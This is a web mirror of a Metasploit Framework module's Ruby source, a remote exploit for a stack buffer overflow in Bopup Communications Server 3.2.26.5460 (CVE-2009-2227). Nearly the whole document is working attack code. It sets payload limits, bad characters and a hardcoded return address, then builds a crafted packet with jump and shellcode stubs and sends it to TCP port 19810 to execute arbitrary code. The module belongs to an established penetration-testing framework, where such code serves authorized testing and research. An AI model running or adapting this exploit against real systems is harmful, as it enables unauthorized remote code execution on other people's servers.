CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bopup_comm.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Bopup Communications Server Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.

16
          By sending a specially crafted packet, an attacker may be

17
          able to execute arbitrary code.

18
      },

19
      'Author'         => [ 'MC' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'CVE', '2009-2227' ],

24
          [ 'OSVDB', '55275' ],

25
          [ 'URL', 'http://www.blabsoft.com/products/server' ],

26
          [ 'EDB', '9002' ]

27
        ],

28
      'DefaultOptions' =>

29
        {

30
          'EXITFUNC' => 'thread',

31
        },

32
      'Payload'        =>

33
        {

34
          'Space'    => 417,

35
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",

36
          'StackAdjustment' => -3500,

37
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",

38
        },

39
      'Platform'       => 'win',

40
      'Targets'        =>

41
        [

42
          [ 'Bopup Communications Server 3.2.26.5460',   { 'Ret' => 0x0041add2 } ],

43
        ],

44
      'Privileged'     => true,

45
      'DefaultTarget'  => 0,

46
      'DisclosureDate' => '2009-06-18'))

47


48
    register_options(

49
      [

50
        Opt::RPORT(19810)

51
      ])

52
  end

53


54
  def exploit

55
    connect

56


57
    sploit =  [0x00000001].pack('V')

58
    sploit << rand_text_alpha_upper(829 - payload.encoded.length)

59
    sploit << payload.encoded

60
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-380").encode_string

61
    sploit << rand_text_alpha_upper(27)

62
    sploit << Rex::Arch::X86.jmp_short(222) + rand_text_english(2)

63
    sploit << [target.ret].pack('V')

64


65
    print_status("Trying target #{target.name}...")

66
    sock.put(sploit)

67


68
    handler

69
    disconnect

70
  end

71
end

72


73